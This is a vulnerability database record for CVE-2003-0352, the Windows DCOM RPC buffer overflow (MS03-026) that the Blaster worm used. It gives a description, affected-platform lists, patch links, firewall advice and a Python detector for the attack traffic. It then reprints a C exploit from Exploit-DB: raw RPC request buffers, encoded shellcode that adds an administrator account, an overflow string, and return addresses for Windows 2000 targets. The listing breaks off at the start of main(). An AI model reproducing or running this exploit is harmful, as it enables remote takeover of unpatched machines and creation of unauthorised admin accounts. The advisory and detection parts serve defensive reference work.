CVE-2003-0352
CVSS 7.5
Published: 2003-08-18 00:00:00
Revised: 2016-10-17 22:32:57

[Original] Buffer overflow in a certain DCOM interface for RPC in Microsoft Windows NT 4.0, 2000, XP, and Server 2003 allows remote attackers to execute arbitrary code via a malformed message, as exploited by the Blaster/MSblast/LovSAN and Nachi/Welchia worms.


[CNNVD] Microsoft Windows DCOM RPC Interface Long Hostname Remote Buffer Overflow Vulnerability (MS03-026) (CNNVD-200308-059)

        
Remote Procedure Call (RPC) is a remote procedure call protocol used by the Windows operating system. RPC provides an inter-process communication mechanism that allows a program running on one computer to seamlessly execute code on a remote system. The protocol itself is derived from the OSF RPC protocol, with Microsoft-specific extensions added.
Microsoft's RPC implementation has a flaw in how it handles message exchange over TCP/IP; a remote attacker can exploit this vulnerability to execute arbitrary instructions on the system with Local System privileges.
The vulnerability is caused by improper handling of malformed messages and affects the DCOM interface that runs over RPC. This interface handles DCOM object activation requests (such as UNC paths) sent by client machines to the server. An attacker who successfully exploits this vulnerability can execute arbitrary instructions with Local System privileges, and can therefore perform any action on the system, such as installing programs; viewing, changing or deleting data; or creating accounts with administrator privileges.
To exploit this vulnerability, an attacker needs to send a specially crafted request to port 135 on the remote machine.
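A defender-side check for the activation-request pattern described above, written as an added example (it is not code from this database record or from any of the exploit listings below): it parses DCE/RPC bind and request PDUs, flags binds to the two DCOM activation interfaces whose UUIDs appear in the listings on this page, and flags request stub data whose UTF-16LE UNC path carries an oversized host name or total length. The bind sample is the bind string from the ey4s listing; the request stubs, the PDU builder and the length thresholds are constructed here and are not the real RemoteActivation NDR layout.

```python
"""Detection helper for the MS03-026 traffic pattern: a DCE/RPC bind to a DCOM
activation interface, then an activation request carrying an oversized UNC path."""
import struct
import uuid

# Interface UUIDs from the exploit listings on this page: the abstract syntax in
# the C exploit's bind string, and the interface the Metasploit module binds to.
DCOM_ACTIVATION_UUIDS = {
    uuid.UUID("000001a0-0000-0000-c000-000000000046"): "ISystemActivator",
    uuid.UUID("4d9f4ab8-7d1c-11cf-861e-0020af6e7c57"): "IRemoteActivation",
}
PTYPE_REQUEST, PTYPE_BIND = 0x00, 0x0B
# Constructed thresholds: a host label is at most 63 chars, MAX_PATH is 260.
MAX_HOST_CHARS, MAX_PATH_CHARS = 63, 260


def parse_header(pdu):
    """Return (ptype, frag_len, little_endian) from a 16-byte DCE/RPC header."""
    if len(pdu) < 16 or pdu[0] != 5:            # RPC version 5 only
        return None
    little = (pdu[4] & 0xF0) == 0x10            # data representation byte order
    frag_len = struct.unpack(("<" if little else ">") + "H", pdu[8:10])[0]
    return pdu[2], frag_len, little


def bind_interfaces(pdu):
    """List (abstract-syntax UUID, (major, minor)) for every context in a bind."""
    hdr = parse_header(pdu)
    if hdr is None or hdr[0] != PTYPE_BIND or len(pdu) < 28:
        return []
    little = hdr[2]
    end = "<" if little else ">"
    # bind body: max_xmit(2) max_recv(2) assoc_group(4) n_ctx(1) pad(3) contexts
    n_ctx, off, found = pdu[24], 28, []
    for _ in range(n_ctx):
        if off + 24 > len(pdu):
            break
        n_ts = pdu[off + 2]   # context: id(2) n_ts(1) pad(1) abstract(20) n_ts*syntax(20)
        raw = pdu[off + 4:off + 20]
        iface = uuid.UUID(bytes_le=raw) if little else uuid.UUID(bytes=raw)
        found.append((iface, struct.unpack(end + "HH", pdu[off + 20:off + 24])))
        off += 24 + 20 * n_ts
    return found


def unc_string_lengths(stub):
    """(host_chars, total_chars) for each UTF-16LE string in stub starting with two
    backslashes; the host part ends at the next backslash or at the terminator."""
    out, pos = [], 0
    while True:
        i = stub.find(b"\x5c\x00\x5c\x00", pos)
        if i < 0:
            return out
        j, host_end = i + 4, None
        while j + 1 < len(stub) and stub[j:j + 2] != b"\x00\x00":
            if host_end is None and stub[j:j + 2] == b"\x5c\x00":
                host_end = j
            j += 2
        host_end = j if host_end is None else host_end
        out.append(((host_end - i - 4) // 2, (j - i) // 2))
        pos = j + 2


def inspect_pdu(pdu):
    """Return alert strings for one PDU; an empty list means nothing matched."""
    alerts, hdr = [], parse_header(pdu)
    if hdr is None:
        return alerts
    ptype, frag_len, little = hdr
    if ptype == PTYPE_BIND:
        for iface, (major, minor) in bind_interfaces(pdu):
            name = DCOM_ACTIVATION_UUIDS.get(iface)
            if name:
                alerts.append(f"bind to DCOM activation interface {name} {iface} v{major}.{minor}")
    elif ptype == PTYPE_REQUEST and len(pdu) >= 24:
        opnum = struct.unpack(("<" if little else ">") + "H", pdu[22:24])[0]
        stub_off = 24 + (16 if pdu[3] & 0x80 else 0)   # PFC_OBJECT_UUID flag set?
        for host, total in unc_string_lengths(pdu[stub_off:frag_len]):
            if host > MAX_HOST_CHARS or total > MAX_PATH_CHARS:
                alerts.append(f"opnum {opnum}: UNC path host={host} total={total} wide "
                              f"chars (MS03-026 long hostname/filename pattern)")
    return alerts


def build_request(stub, opnum=0, call_id=1):
    """Wrap constructed stub data in a minimal little-endian request PDU."""
    hdr = bytes([5, 0, PTYPE_REQUEST, 0x03, 0x10, 0, 0, 0])
    hdr += struct.pack("<HHI", 24 + len(stub), 0, call_id)
    return hdr + struct.pack("<IHH", len(stub), 1, opnum) + stub


# Sample 1: the bind PDU from the ey4s listing on this page (its bindstr bytes).
PAGE_BIND_PDU = bytes.fromhex(
    "05000b0310000000480000007f000000d016d016000000000100000001000100"
    "a001000000000000c00000000000004600000000045d888aeb1cc9119fe80800"
    "2b10486002000000")
# Samples 2 and 3: constructed stubs (not the real RemoteActivation NDR layout):
# padding, then a UTF-16LE UNC path and its terminator.
BENIGN_STUB = b"\x00" * 8 + "\\\\FILESRV\\C$\\report.doc".encode("utf-16-le") + b"\x00\x00"
OVERLONG_STUB = b"\x00" * 8 + ("\\\\" + "A" * 600 + "\\x.doc").encode("utf-16-le") + b"\x00\x00"
```

Feed each PDU of a port-135 conversation to `inspect_pdu`; a bind alert followed by a request alert on the same connection is the sequence both exploit listings on this page produce.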

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/o:microsoft:windows_nt:4.0:sp6a:server  Microsoft Windows 4.0 sp6a server
cpe:/o:microsoft:windows_2003_server:r2::datacenter_64-bit
cpe:/o:microsoft:windows_2000::sp3:datacenter_server  Microsoft Windows 2000 Datacenter Server SP3
cpe:/o:microsoft:windows_nt:4.0:sp6a:terminal_server  Microsoft Windows NT Terminal Server 4.0 SP6a
cpe:/o:microsoft:windows_2000::sp4:datacenter_server  Microsoft Windows 2000 Datacenter Server SP4
cpe:/o:microsoft:windows_xp::sp1:64-bit
cpe:/o:microsoft:windows_2000::sp1:datacenter_server  Microsoft Windows 2000 Datacenter Server SP1
cpe:/o:microsoft:windows_2000::sp2:datacenter_server  Microsoft Windows 2000 Datacenter Server SP2
cpe:/o:microsoft:windows_nt:4.0:sp5:terminal_server  Microsoft Windows NT Terminal Server 4.0 SP5
cpe:/o:microsoft:windows_nt:4.0:sp2:terminal_server  Microsoft Windows NT Terminal Server 4.0 SP2
cpe:/o:microsoft:windows_nt:4.0:sp6:terminal_server  Microsoft Windows NT Terminal Server 4.0 SP6
cpe:/o:microsoft:windows_nt:4.0:sp6a:enterprise_server
cpe:/o:microsoft:windows_2000:::advanced_server
cpe:/o:microsoft:windows_nt:4.0:sp5:enterprise_server
cpe:/o:microsoft:windows_nt:4.0:sp6:enterprise_server
cpe:/o:microsoft:windows_nt:4.0:sp6a:workstation  Microsoft Windows 4.0 sp6a workstation
cpe:/o:microsoft:windows_2000::sp3:professional  Microsoft Windows 2000 Professional SP3
cpe:/o:microsoft:windows_2003_server:enterprise::64-bit
cpe:/o:microsoft:windows_2000::sp4:professional  Microsoft Windows 2000 Professional SP4
cpe:/o:microsoft:windows_nt:4.0:sp5:server  Microsoft Windows 4.0 sp5 server
cpe:/o:microsoft:windows_2000::sp1:professional  Microsoft Windows 2000 Professional SP1
cpe:/o:microsoft:windows_nt:4.0:sp6:server  Microsoft Windows 4.0 sp6 server
cpe:/o:microsoft:windows_2000::sp2:professional  Microsoft Windows 2000 Professional SP2
cpe:/o:microsoft:windows_nt:4.0:sp3:server  Microsoft Windows 4.0 sp3 server
cpe:/o:microsoft:windows_2000:::datacenter_server
cpe:/o:microsoft:windows_nt:4.0:sp4:server  Microsoft Windows 4.0 sp4 server
cpe:/o:microsoft:windows_nt:4.0:sp1:server  Microsoft Windows 4.0 sp1 server
cpe:/o:microsoft:windows_nt:4.0::terminal_server
cpe:/o:microsoft:windows_nt:4.0:sp2:server  Microsoft Windows 4.0 sp2 server
cpe:/o:microsoft:windows_2000::sp1:server  Microsoft Windows 2000 Server SP1
cpe:/o:microsoft:windows_2000::sp4:server  Microsoft Windows 2000 Server SP4
cpe:/o:microsoft:windows_2000::sp3:server  Microsoft Windows 2000 Server SP3
cpe:/o:microsoft:windows_2000::sp2:server  Microsoft Windows 2000 Server SP2
cpe:/o:microsoft:windows_nt:4.0:sp5:workstation  Microsoft Windows 4.0 sp5 workstation
cpe:/o:microsoft:windows_xp::sp1:home
cpe:/o:microsoft:windows_nt:4.0:sp6:workstation  Microsoft Windows 4.0 sp6 workstation
cpe:/o:microsoft:windows_nt:4.0:sp3:workstation  Microsoft Windows 4.0 sp3 workstation
cpe:/o:microsoft:windows_2003_server:web
cpe:/o:microsoft:windows_nt:4.0:sp4:workstation  Microsoft Windows 4.0 sp4 workstation
cpe:/o:microsoft:windows_nt:4.0:sp1:workstation  Microsoft Windows 4.0 sp1 workstation
cpe:/o:microsoft:windows_nt:4.0:sp2:workstation  Microsoft Windows 4.0 sp2 workstation
cpe:/o:microsoft:windows_nt:4.0::workstation
cpe:/o:microsoft:windows_2003_server:enterprise_64-bit
cpe:/o:microsoft:windows_2003_server:standard::64-bit
cpe:/o:microsoft:windows_nt:4.0::enterprise_server
cpe:/o:microsoft:windows_nt:4.0:sp3:enterprise_server
cpe:/o:microsoft:windows_nt:4.0:sp4:enterprise_server
cpe:/o:microsoft:windows_nt:4.0:sp1:enterprise_server
cpe:/o:microsoft:windows_nt:4.0:sp2:enterprise_server
cpe:/o:microsoft:windows_nt:4.0::server
cpe:/o:microsoft:windows_nt:4.0:sp4:terminal_server  Microsoft Windows NT Terminal Server 4.0 SP4
cpe:/o:microsoft:windows_nt:4.0:sp1:terminal_server  Microsoft Windows NT Terminal Server 4.0 SP1
cpe:/o:microsoft:windows_nt:4.0:sp3:terminal_server  Microsoft Windows NT Terminal Server 4.0 SP3
cpe:/o:microsoft:windows_xp::gold:professional  Microsoft Windows XP Professional Gold
cpe:/o:microsoft:windows_2003_server:r2::64-bit
cpe:/o:microsoft:windows_2000::sp4:advanced_server  Microsoft Windows 2000 Advanced Server SP4
cpe:/o:microsoft:windows_2000::sp3:advanced_server  Microsoft Windows 2000 Advanced Server SP3
cpe:/o:microsoft:windows_2000::sp2:advanced_server  Microsoft Windows 2000 Advanced Server SP2
cpe:/o:microsoft:windows_2000::sp1:advanced_server  Microsoft Windows 2000 Advanced Server SP1
cpe:/o:microsoft:windows_xp:::64-bit
cpe:/o:microsoft:windows_2000:::server
cpe:/o:microsoft:windows_2000:::professional
cpe:/o:microsoft:windows_xp:::home

- OVAL (technical details for detection)

oval:org.mitre.oval:def:296  Windows 2000 RPCSS DCOM Buffer Overflow (Blaster, Test 2)
oval:org.mitre.oval:def:2343  Windows XP RPCSS DCOM Buffer Overflow (Blaster, Test 2)
oval:org.mitre.oval:def:194  Windows NT RPCSS DCOM Buffer Overflow (Blaster, Test 2)
*OVAL describes in detail how to detect this vulnerability; the related OVAL definitions give further technical details on detecting it.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0352
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0352
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200308-059
(official data source) CNNVD

- Other links and resources

http://lists.grok.org.uk/pipermail/full-disclosure/2003-July/007079.html
(UNKNOWN)  FULLDISC  20030726 Re: The French BUGTRAQ (New Win RPC Exploit)
http://lists.grok.org.uk/pipermail/full-disclosure/2003-July/007357.html
(UNKNOWN)  FULLDISC  20030730 rpcdcom Universal offsets
http://marc.info/?l=bugtraq&m=105838687731618&w=2
(UNKNOWN)  BUGTRAQ  20030716 [LSD] Critical security vulnerability in Microsoft Operating Systems
http://marc.info/?l=bugtraq&m=105914789527294&w=2
(UNKNOWN)  BUGTRAQ  20030725 The Analysis of LSD's Buffer Overrun in Windows RPC Interface(code revised )
http://www.cert.org/advisories/CA-2003-16.html
(UNKNOWN)  CERT  CA-2003-16
http://www.cert.org/advisories/CA-2003-19.html
(UNKNOWN)  CERT  CA-2003-19
http://www.kb.cert.org/vuls/id/568148
(UNKNOWN)  CERT-VN  VU#568148
http://www.microsoft.com/technet/security/bulletin/MS03-026.asp
(UNKNOWN)  MS  MS03-026
http://www.securityfocus.com/bid/8205
(VENDOR_ADVISORY)  BID  8205
http://www.xfocus.org/documents/200307/2.html
(UNKNOWN)  MISC  http://www.xfocus.org/documents/200307/2.html
http://xforce.iss.net/xforce/xfdb/12629
(VENDOR_ADVISORY)  XF  win-rpc-dcom-bo(12629)

- Vulnerability information

Microsoft Windows DCOM RPC Interface Long Hostname Remote Buffer Overflow Vulnerability (MS03-026)
High risk  Boundary condition error
2003-08-18 00:00:00 2005-10-20 00:00:00
Remote
        

- Advisories and patches

Temporary workaround:
If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
* Use a firewall to filter the system's service ports so that untrusted hosts cannot reach them. The affected operating systems are Windows NT/2000/XP/2003; users of Windows 95/98/ME are not affected by this issue. Because the vulnerability attacks the system through a weakness in the Windows DCOM RPC interface, and the ports on which a Windows system accepts RPC calls include at least the following:
135/TCP epmap DCE endpoint resolution
135/UDP epmap DCE endpoint resolution
139/TCP netbios-ssn NETBIOS Session Service
139/UDP netbios-ssn NETBIOS Session Service
445/TCP microsoft-ds Win2k+ Server Message Block
445/UDP microsoft-ds Win2k+ Server Message Block
593/TCP http-rpc-epmap HTTP RPC Ep Map
593/UDP http-rpc-epmap HTTP RPC Ep Map
Vendor patch:
Microsoft
---------
Microsoft has released security bulletin MS03-026 and the corresponding patch:
MS03-026: Buffer Overrun In RPC Interface Could Allow Code Execution (Q823980)
Link:
http://www.microsoft.com/technet/security/bulletin/MS03-026.asp

Patch download:
        Windows NT 4.0 Server:
        
        http://microsoft.com/downloads/details.aspx?FamilyId=2CC66F4E-217E-4FA7-BDBF-DF77A0B9303F&displaylang=en

        Windows NT 4.0 Terminal Server Edition :
        
        http://microsoft.com/downloads/details.aspx?FamilyId=6C0F0160-64FA-424C-A3C1-C9FAD2DC65CA&displaylang=en

        Windows 2000:
        
        http://microsoft.com/downloads/details.aspx?FamilyId=C8B8A846-F541-4C15-8C9F-220354449117&displaylang=en

        Windows XP 32 bit Edition:
        
        http://microsoft.com/downloads/details.aspx?FamilyId=2354406C-C5B6-44AC-9532-3DE40F69C074&displaylang=en

        Windows XP 64 bit Edition:
        
        http://microsoft.com/downloads/details.aspx?FamilyId=1B00F5DF-4A85-488F-80E3-C347ADCC4DF1&displaylang=en

        Windows Server 2003 32 bit Edition:
        
        http://microsoft.com/downloads/details.aspx?FamilyId=F8E0FF3A-9F4C-4061-9009-3A212458E92E&displaylang=en

        Windows Server 2003 64 bit Edition:
        
        http://microsoft.com/downloads/details.aspx?FamilyId=2B566973-C3F0-4EC1-995F-017E35692BC7&displaylang=en

- Vulnerability information (100)

MS Windows (RPC DCOM) Long Filename Overflow Exploit (MS03-026) (EDBID:100)
windows remote
2003-09-16 Verified
135 ey4s
N/A
#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#include <windows.h>
#include <process.h>
#include <string.h>
#include <winbase.h>

#pragma comment(lib,"ws2_32")

unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00};

unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x5C,0x00,0x5C,0x00};

unsigned char request3[]={
0x5C,0x00
,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};

//user="e" pass="asd#321"
unsigned char sc_add_user[]=
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x3E\x01\x80\x34\x0A\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x31\x99\x99\x99\xC3\x21\x95\x69"
"\x64\xE6\x12\x99\x12\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5"
"\x9A\x6A\x12\xEF\xE1\x9A\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA"
"\x74\xCF\xCE\xC8\x12\xA6\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED"
"\x91\xC0\xC6\x1A\x5E\x9D\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF"
"\xBD\x9A\x5A\x48\x78\x9A\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A"
"\x5A\x58\x78\x9B\x9A\x58\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F"
"\x97\x12\x49\xF3\x9A\xC0\x71\xBD\x99\x99\x99\xF1\x66\x66\x66\x99"
"\xF1\x99\x89\x99\x99\xF3\x9D\x66\xCE\x6D\x22\x81\x69\x64\xE6\x10"
"\x9A\x1A\x5F\x95\xAA\x59\xC9\xCF\x66\xCE\x61\xC9\x66\xCE\x65\xAA"
"\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B"
"\x77\xAA\x59\x5A\x71\xCA\x66\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA"
"\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xD1\xFC\xF8\xE9\xDA\xEB\xFC\xF8"
"\xED\xFC\x99\xCE\xF0\xF7\xDC\xE1\xFC\xFA\x99\xDC\xE1\xF0\xED\xC9"
"\xEB\xF6\xFA\xFC\xEA\xEA\x99\xFA\xF4\xFD\xB9\xB6\xFA\xB9\xF7\xFC"
"\xED\xB9\xEC\xEA\xFC\xEB\xB9\xFC\xB9\xF8\xEA\xFD\xBA\xAA\xAB\xA8"
"\xB9\xB6\xF8\xFD\xFD\xB9\xBF\xBF\xB9\xF7\xFC\xED\xB9\xF5\xF6\xFA"
"\xF8\xF5\xFE\xEB\xF6\xEC\xE9\xB9\xF8\xFD\xF4\xF0\xF7\xF0\xEA\xED"
"\xEB\xF8\xED\xF6\xEB\xEA\xB9\xFC\xB9\xB6\xF8\xFD\xFD\x99";
#define	sc_offset		0x24
#define	sc_max			0x208
#define	jmp_addr_offset	sc_max+sc_offset+0x8
#define	top_seh_offset	jmp_addr_offset+0x4

unsigned char sc[]=
"\x31\x00\x32\x00\x37\x00\x2e\x00\x30\x00\x2e\x00"
"\x30\x00\x2e\x00\x31\x00\x5c\x00\x49\x00\x50\x00"
"\x43\x00\x24\x00\x5c\x00"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"\xe9\xf3\xfd\xff\xff"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE";

unsigned char request4[]={
0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};

struct
{
	char	*os;
	DWORD	dwTopSeh;
	char	*seh;
	DWORD	dwJmpAddr;
	char	*jmp;
}
targets[] =
{
	{ "2kEnSp4+MS03-026", 
		0x7c54144c,
		"kernel32.dll v5.0.2195.6688",
		0x77a1b496,
		"OLEAUT32.dll v2.40.4522.0"},
	{ "2kEnSp3+SomeHotFixs+MS03-026", 
		0x77eda1f0,
		"kernel32.dll v5.0.2195.6079",
		0x77a1afa9,
		"OLEAUT32.dll v2.40.4518.0"}
}, v;
void main(int argc,char ** argv)
{
    WSADATA WSAData;
    SOCKET sock;
    int len,len1;
    SOCKADDR_IN addr_in;
    short port=135;
    unsigned char buf1[0x1000];
    unsigned char buf2[0x1000];
	int	i, iType;

